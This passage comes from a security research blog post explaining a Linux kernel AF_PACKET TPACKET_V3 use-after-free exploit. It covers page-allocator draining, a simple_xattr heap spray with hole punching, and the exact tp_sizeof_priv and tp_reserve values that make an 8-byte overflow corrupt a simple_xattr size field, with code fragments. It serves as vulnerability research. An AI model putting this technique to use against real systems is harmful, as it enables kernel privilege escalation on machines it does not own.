Same call site + same size = guaranteed same slab cache = the new pgv array lands on the exact memory the old one occupied.</p><p>The following diagram shows the pgv array through its three states &#8212; before free, after free (zeroed, dangerous), and after reclamation (new blocks, smaller size). The stale pkc-&gt;pkbdq pointer references the same memory address throughout:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!CIRL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!CIRL!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 424w, https://substackcdn.com/image/fetch/$s_!CIRL!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 848w, https://substackcdn.com/image/fetch/$s_!CIRL!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 1272w, https://substackcdn.com/image/fetch/$s_!CIRL!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!CIRL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png" width="1456" height="931" 
data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:931,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:367575,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/189789999?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!CIRL!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 424w, https://substackcdn.com/image/fetch/$s_!CIRL!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 848w, https://substackcdn.com/image/fetch/$s_!CIRL!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 1272w, https://substackcdn.com/image/fetch/$s_!CIRL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7285f603-2fc4-4131-ac1d-52f2444bf87e_2224x1422.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" 
viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Before reclamation, the stale pointer would find NULLs and the kernel would crash. After reclamation it finds valid pointers &#8212; but to <strong>smaller</strong> 16 KB blocks instead of the original 32 KB blocks. This size mismatch is what enables the overflow: the stale kblk_size = 32768 makes tpacket_rcv() believe each block is 32 KB, but the actual blocks are only 16 KB, so writes beyond 16 KB spill into adjacent memory.</p><h4>Part 2: Heap grooming for page layout</h4><p>The exploit needs to achieve two things through heap grooming:</p><ol><li><p><strong>Force tpacket_rcv() to advance past block 0 to block 1.</strong> Block 0&#8217;s stale nxt_offset points into the old freed 32KB page &#8212; writing there would be uncontrolled. 
Block 1 gets a fresh nxt_offset via prb_open_block() that points into an actual reclaimed page.</p></li><li><p><strong>Ensure block 1 of the reclamation ring is physically adjacent to a simple_xattr.</strong> The overflow from block 1 must spill into a victim object, not into random memory.</p></li></ol><p>To force the block 1 path, the exploit needs curr &gt; end in __packet_lookup_frame_in_block(). This means the stale nxt_offset (from old block 0) must be at a <strong>higher</strong> address than new_block_0 + 32768. To ensure adjacency, the reclamation ring&#8217;s blocks must land in a region densely packed with simple_xattr objects. The exploit achieves both through a carefully staged allocation sequence:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;6c7bdbde-9a1d-4bd2-babc-f222a79cfebb&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Phase 1: Drain the page allocator
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
Step 1: Allocate 1024 &#215; 16KB pages (drains order-2 freelist)
Step 2: Allocate 1024 &#215; 32KB pages (drains order-3 freelist)      &#8592; "drain batch 1"
Step 3: Allocate 512 &#215; 32KB pages (more order-3 drain)            &#8592; "drain batch 2"

After draining, the order-2 and order-3 freelists are empty.
Any new allocation at these sizes must come from splitting higher-order pages.

Phase 2: Allocate the victim ring buffer
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
Step 4: Configure victim socket &#8594; RX ring allocates 2 &#215; 32KB blocks (order-3)

Since the order-3 freelist is empty, these blocks come from splitting
order-4 or higher pages &#8594; they land at HIGH virtual addresses.

Phase 3: Build the simple_xattr spray region
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
Step 5: Free drain batch 1 (1024 &#215; 32KB order-3 pages)

These pages return to the order-3 freelist at LOWER addresses
than the victim's blocks (they were allocated earlier, before draining
pushed the allocator to higher-order pages).

Step 6: Spray 2048 simple_xattr objects (each with 8KB value &#8594; order-2 page)

The order-2 freelist is still empty (drained in step 1, never freed).
So the buddy allocator splits the just-freed order-3 pages from step 5:
each 32KB page becomes two 16KB halves. The simple_xattr values fill
these halves, creating a dense region of order-2 pages at LOW addresses.

Step 7: Free sparse holes &#8212; every 128th xattr starting from index 512

    for (i = 512; i &lt; 2048; i += 128)
        removexattr(simple_xattr_requests[i]);

This frees ~12 order-2 pages scattered among the simple_xattr objects,
returning them to the order-2 freelist. These holes are the landing
slots for the reclamation ring's blocks.

Phase 4: Trigger the race and reclaim
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
Step 8: Win the race &#8594; packet_set_ring() frees the old ring buffer

The victim's 2 &#215; 32KB blocks are freed back to the order-3 freelist.
They are at HIGH addresses. The pgv array (16 bytes) is freed to slab.

Step 9: pg_vec_buffer_thread immediately reclaims:
    alloc_pages(reclaim_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16, PAGES_ORDER2_SIZE)

This allocates a new ring with 2 &#215; 16KB blocks. The allocator needs
order-2 pages. The order-2 freelist has the sparse holes from step 7
(exact-size matches), so it serves from those FIRST &#8212; before considering
splitting the victim's freed order-3 pages. The reclamation blocks
land in the holes among the simple_xattr objects, at LOW addresses,
surrounded by simple_xattr objects on both sides.</code></pre></div><p>The result is this memory layout:</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ppH3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ppH3!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 424w, https://substackcdn.com/image/fetch/$s_!ppH3!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 848w, https://substackcdn.com/image/fetch/$s_!ppH3!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 1272w, https://substackcdn.com/image/fetch/$s_!ppH3!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ppH3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png" width="1456" height="361" 
data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:361,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:195361,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/189789999?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ppH3!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 424w, https://substackcdn.com/image/fetch/$s_!ppH3!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 848w, https://substackcdn.com/image/fetch/$s_!ppH3!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 1272w, https://substackcdn.com/image/fetch/$s_!ppH3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Why block 0 can&#8217;t work, even if it were reclaimed.</strong> One might ask: couldn&#8217;t the victim&#8217;s freed order-3 blocks be buddy-split into order-2 halves, with one 
half adjacent to a simple_xattr? The answer is no &#8212; those blocks are at high addresses, far from the simple_xattr spray region. Even if the buddy allocator did split them, the two halves would be adjacent to <em>each other</em> (they&#8217;re buddy pairs), not to any simple_xattr. The exploit has no control over what&#8217;s physically next to the victim&#8217;s old pages.</p><p>By contrast, the reclamation blocks land in the carefully prepared holes among the simple_xattr spray, where adjacency is guaranteed. But the stale nxt_offset for block 0 still points to the victim&#8217;s old high-address region, not into these holes. So the exploit must force advancement to block 1.</p><p><strong>The stale metadata.</strong> The TPACKET_V3 metadata (prb_bdqc) in the victim socket is <strong>not updated</strong> during the free &#8212; it still contains stale values from the original 32 KB ring:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;f361d73e-1411-4379-bd3f-b12ab00162f1&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">pkc-&gt;pkbdq         &#8594; old pgv array address (now reclaimed with new pgv)
pkc-&gt;kblk_size     &#8594; 32768 (32 KB &#8212; the OLD block size)
pkc-&gt;knum_blocks   &#8594; 2
pkc-&gt;blk_sizeof_priv &#8594; 16248
pkc-&gt;kactive_blk_num &#8594; 0
pkc-&gt;nxt_offset    &#8594; old_block_0 + 16296 (HIGH address &#8212; stale)</code></pre></div><p>When tpacket_rcv() accesses the ring buffer through __packet_lookup_frame_in_block():</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;21a913d4-a550-4da9-8fc6-fdc6ebe1f883&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">pkc = &amp;po-&gt;rx_ring.prb_bdqc;
pbd = pkc-&gt;pkbdq[pkc-&gt;kactive_blk_num].buffer;  // reads reclaimed pgv[0].buffer
                                                   // = new 16KB block (LOW address, in xattr region)
curr = pkc-&gt;nxt_offset;    // old_block_0 + 16296 (HIGH address &#8212; stale)
end = (char *)pbd + pkc-&gt;kblk_size;   // new_block_0 + 32768 (still LOW)

if (curr + ALIGN(len, 8) &lt; end) {
    // packet fits in current block &#8212; write here
} else {
    prb_retire_current_block(pkc, po, 0);         // retire new_block_0
    curr = prb_dispatch_next_block(pkc, po);      // advance to new_block_1
    // ... write to new_block_1
}</code></pre></div><p>Since curr (high address) &gt; end (low address + 32KB), the &#8220;doesn&#8217;t fit&#8221; branch is always taken, and tpacket_rcv() advances to block 1 &#8212; which is in the groomed region, adjacent to a simple_xattr.</p><h4>Part 3: The precision overflow</h4><p>When tpacket_rcv() takes the &#8220;doesn&#8217;t fit&#8221; path, it calls prb_retire_current_block() then prb_dispatch_next_block(), which advances to block 1 and calls prb_open_block():</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;a1b03f99-29f5-4e2c-a072-4c72e3887b1e&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">static void prb_open_block(struct tpacket_kbdq_core *pkc,
    struct tpacket_block_desc *pbd)
{
    pkc-&gt;pkblk_start = (char *)pbd;   // start of reclaimed block 1 (16 KB)
    pkc-&gt;nxt_offset = pkc-&gt;pkblk_start + BLK_PLUS_PRIV(pkc-&gt;blk_sizeof_priv);
    pkc-&gt;pkblk_end = pkc-&gt;pkblk_start + pkc-&gt;kblk_size;  // + 32KB (stale!)
}</code></pre></div><p>The key computation: BLK_PLUS_PRIV(blk_sizeof_priv) = BLK_HDR_LEN + ALIGN(blk_sizeof_priv, 8) where BLK_HDR_LEN = ALIGN(sizeof(struct tpacket_block_desc), 8) = 48. With blk_sizeof_priv = 16248:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;d24e8c9c-cf23-4771-9ffb-423b4b58c878&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">nxt_offset = reclaimed_block_1 + 48 + 16248 = reclaimed_block_1 + 16296</code></pre></div><p>The actual block size is 16,384 bytes (16 KB = 4 pages). So nxt_offset is positioned <strong>88 bytes before the end</strong> of the actual block. But pkblk_end is computed using the stale kblk_size = 32768, placing it 16 KB past the real end &#8212; so tpacket_rcv() believes there&#8217;s plenty of room.</p><p>Back in tpacket_rcv(), the function returns h.raw = nxt_offset and proceeds to write at several offsets from h.raw:</p><p><strong>Non-controlled writes</strong> (kernel-generated headers):</p><ul><li><p>At h.raw + 0: the tpacket3_hdr structure (44 bytes of status, timestamps, lengths)</p></li><li><p>At h.raw + 48: the sockaddr_ll structure (~20 bytes of link-layer address info)</p></li></ul><p>These occupy offsets 0 through ~67 from h.raw, fitting within the 88 remaining bytes. 
<strong>They stay inside the block.</strong></p><p><strong>Controlled write</strong> (attacker&#8217;s packet data):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;24e81ca7-7c18-4392-b485-8901fece6daa&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">skb_copy_bits(skb, 0, h.raw + macoff, snaplen);</code></pre></div><p>Where macoff is calculated as:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;338f1605-94b6-4ae3-9815-d00fa2d46c95&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">macoff = netoff - maclen;
netoff = TPACKET_ALIGN(po-&gt;tp_hdrlen + max(maclen, 16)) + po-&gt;tp_reserve;</code></pre></div><p>The exploit controls two knobs in this calculation to land the write at an exact byte offset:</p><ul><li><p><strong>tp_sizeof_priv</strong> (set via setsockopt(PACKET_RX_RING)) &#8212; controls where nxt_offset starts within the block. This is the coarse knob: the kernel rounds it up to 8 bytes (ALIGN(blk_sizeof_priv, 8)), so it can only position nxt_offset at 8-byte increments.</p></li><li><p><strong>tp_reserve</strong> (set via setsockopt(PACKET_RESERVE)) &#8212; adds padding between the TPACKET header and the packet data. This is the fine knob: it&#8217;s added without any rounding, giving byte-level precision.</p></li></ul><p>Together they work like a vernier caliper. The exploit uses tp_sizeof_priv = 16248 and tp_reserve = 38, but any pair where ALIGN(tp_sizeof_priv, 8) + tp_reserve = 16286 works (e.g., 16280 + 6).</p><p>The write position within a block is nxt_offset + macoff:</p><ul><li><p>nxt_offset = 48 + ALIGN(tp_sizeof_priv, 8) = 48 + 16248 = 16296</p></li><li><p>macoff = netoff - maclen, where netoff = TPACKET_ALIGN(tp_hdrlen + 16) + tp_reserve = TPACKET_ALIGN(68 + 16) + 38 = 96 + 38 = 134, and maclen = 14 (ETH_HLEN), so macoff = 120</p></li><li><p>write position = 16296 + 120 = 16416 = 16384 + 32</p></li></ul><p>The block is only 16,384 bytes, so the write lands <strong>32 bytes past the block boundary</strong> into the adjacent page. 
The BPF filter truncates snaplen to sizeof(size_t) = 8 bytes, so the exploit writes exactly <strong>8 bytes</strong> at that offset.</p><p>The following diagram shows the full structure from the packet socket down to the per-block memory layout, including both positioning knobs (blk_sizeof_priv and tp_reserve):</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!OykP!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!OykP!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 424w, https://substackcdn.com/image/fetch/$s_!OykP!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 848w, https://substackcdn.com/image/fetch/$s_!OykP!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 1272w, https://substackcdn.com/image/fetch/$s_!OykP!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!OykP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png" width="1456" height="720" 
data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:720,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:400138,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/189789999?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!OykP!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 424w, https://substackcdn.com/image/fetch/$s_!OykP!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 848w, https://substackcdn.com/image/fetch/$s_!OykP!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 1272w, https://substackcdn.com/image/fetch/$s_!OykP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" 
viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h4>What lives at the overflow offset?</h4><p>The exploit sprays 2,048 simple_xattr kernel objects adjacent to the reclamation blocks. Each xattr is allocated with value_size = 8192, making the total allocation (header + 8,192 bytes) served from order-2 pages (16 KB).</p><p><strong>The overflow lands exactly on the size field</strong> of the adjacent simple_xattr. 
This is not a coincidence &#8212; tp_sizeof_priv (16,248) positions nxt_offset at 16,296, and tp_reserve (38) is chosen so that nxt_offset + macoff = 16,416 = 16,384 + 32, landing precisely at the size field&#8217;s offset within the simple_xattr struct.</p><p>The packet data is crafted with XATTR_SIZE_MAX (65,536) as the first 8 bytes:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;a2040367-5941-46a4-8e34-87e9554c9ff7&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">u8 packet_data[128] = {};
*(size_t *)(packet_data) = XATTR_SIZE_MAX;  // 65536</code></pre></div><p>After the overflow, one of the 2,048 simple_xattr objects has its size field changed from 8,192 to 65,536.</p><h4>Creating the holes for adjacency</h4><p>The simple_xattr spray is arranged to maximize the probability that one ends up immediately after reclamation block 1:</p><p>Step 5: Free drain_pages_order3_1 &#8212; returns 1024 &#215; 32KB pages to the freelist</p><p>Step 6: Spray 2,048 simple_xattr objects &#8212; each needs 16KB (order-2) pages</p><p>Since the order-2 freelist was drained in step 1, the buddy allocator <strong>splits</strong> the freed order-3 pages: each 32 KB page becomes two 16 KB halves. The spray consumes these halves, filling the address range previously occupied by drain_pages_order3_1.</p><p>Before triggering the race, the exploit frees some xattrs at regular intervals to create holes:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;1cfef30d-92dc-4c4c-a89b-ce5b07bcea8d&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">for (int i = 512; i &lt; 2048; i += 128) {
    removexattr(filepath, name_i);  // creates a 16KB hole every 128 objects
